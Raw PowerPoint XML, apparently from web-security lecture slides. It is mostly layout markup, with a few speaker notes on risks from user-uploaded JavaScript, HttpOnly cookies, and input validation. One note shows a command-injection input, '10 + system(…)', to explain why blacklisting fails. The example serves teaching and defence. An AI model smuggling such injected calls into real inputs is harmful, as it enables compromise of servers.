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1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId60"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId61"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="406" r:id="rId2"/>
    <p:sldId id="676" r:id="rId3"/>
    <p:sldId id="686" r:id="rId4"/>
    <p:sldId id="687" r:id="rId5"/>
    <p:sldId id="503" r:id="rId6"/>
    <p:sldId id="664" r:id="rId7"/>
    <p:sldId id="665" r:id="rId8"/>
    <p:sldId id="666" r:id="rId9"/>
    <p:sldId id="684" r:id="rId10"/>
    <p:sldId id="668" r:id="rId11"/>
    <p:sldId id="672" r:id="rId12"/>
    <p:sldId id="673" r:id="rId13"/>
    <p:sldId id="674" r:id="rId14"/>
    <p:sldId id="675" r:id="rId15"/>
    <p:sldId id="677" r:id="rId16"/>
    <p:sldId id="678" r:id="rId17"/>
    <p:sldId id="679" r:id="rId18"/>
    <p:sldId id="680" r:id="rId19"/>
    <p:sldId id="803" r:id="rId20"/>
    <p:sldId id="681" r:id="rId21"/>
    <p:sldId id="682" r:id="rId22"/>
    <p:sldId id="775" r:id="rId23"/>
    <p:sldId id="776" r:id="rId24"/>
    <p:sldId id="777" r:id="rId25"/>
    <p:sldId id="778" r:id="rId26"/>
    <p:sldId id="779" r:id="rId27"/>
    <p:sldId id="782" r:id="rId28"/>
    <p:sldId id="783" r:id="rId29"/>
    <p:sldId id="784" r:id="rId30"/>
    <p:sldId id="785" r:id="rId31"/>
    <p:sldId id="786" r:id="rId32"/>
    <p:sldId id="787" r:id="rId33"/>
    <p:sldId id="791" r:id="rId34"/>
    <p:sldId id="584" r:id="rId35"/>
    <p:sldId id="802" r:id="rId36"/>
    <p:sldId id="688" r:id="rId37"/>
    <p:sldId id="689" r:id="rId38"/>
    <p:sldId id="690" r:id="rId39"/>
    <p:sldId id="691" r:id="rId40"/>
    <p:sldId id="692" r:id="rId41"/>
    <p:sldId id="693" r:id="rId42"/>
    <p:sldId id="694" r:id="rId43"/>
    <p:sldId id="804" r:id="rId44"/>
    <p:sldId id="695" r:id="rId45"/>
    <p:sldId id="696" r:id="rId46"/>
    <p:sldId id="697" r:id="rId47"/>
    <p:sldId id="700" r:id="rId48"/>
    <p:sldId id="701" r:id="rId49"/>
    <p:sldId id="702" r:id="rId50"/>
    <p:sldId id="703" r:id="rId51"/>
    <p:sldId id="708" r:id="rId52"/>
    <p:sldId id="704" r:id="rId53"/>
    <p:sldId id="715" r:id="rId54"/>
    <p:sldId id="716" r:id="rId55"/>
    <p:sldId id="717" r:id="rId56"/>
    <p:sldId id="718" r:id="rId57"/>
    <p:sldId id="733" r:id="rId58"/>
    <p:sldId id="663" r:id="rId5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Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>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00"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="FF00FF"/>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647" autoAdjust="0"/>
    <p:restoredTop sz="92554" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="-776" y="-112"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66"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191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slide" Target="slides/slide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69705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="0"/>
            <a:ext cx="3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{70A61926-2DC5-4891-8960-FD62370D8A91}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2282234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169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="0"/>
            <a:ext cx="3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1260475" y="720725"/>
            <a:ext cx="4800600" cy="36004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975791" y="4559928"/>
            <a:ext cx="5363618" cy="4320861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="4831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462" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134018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3A4721-C72F-4C19-B570-344E3B64DDD7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="965276"/>
            <a:fld id="{FECA9C15-561B-4BB1-94F5-81AFD468D0EE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="965276"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This slide shows another situation, in which a social networking site allows users to build and upload their own applications. If these applications are unrestricted JavaScript that runs on the users browser, then the JavaScript from an application could read user information, act as the user (such as post to other comment walls), or interfere with the site in other ways.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="966610"/>
            <a:fld id="{160F6800-698E-4ED4-A4B9-A0AAFB4B2E23}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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defTabSz="966610"/>
            <a:fld id="{1C4C3A0A-69B9-427D-B48D-A26349689D6A}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="966610"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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mtClean="0"/>
              <a:t>FF2, Chrome:    HttpOnly cookie can be overwritten to by script    (but cannot be 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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:    allow only digits,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> +, -, *, /  in  $in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Blacklisting (bad):   disallow  “;”  in $in    ---    but attacker can do “ 10 + system(…) ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7765A005-811F-4974-8202-6CEA404E2468}"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CEFCB-E197-4C11-8A46-851C02279434}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382402" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13824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81CD40-DA12-4893-857A-2E2D59A4F097}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331202" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This snipet is in VB.</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FA74A54-A892-4428-971E-34A2DA7C937B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>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C6BBD4A-5CDB-4E5A-B745-31F786255EE0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>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5442B1-B98E-4957-AE8F-A1451D9B102A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44034" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="4560570"/>
            <a:ext cx="5852160" cy="432054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6B52C292-C2C7-4F31-A1D1-3E1CA5F9F58B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>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03E514-1BC3-4CDD-8A10-6C1AF9A233ED}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
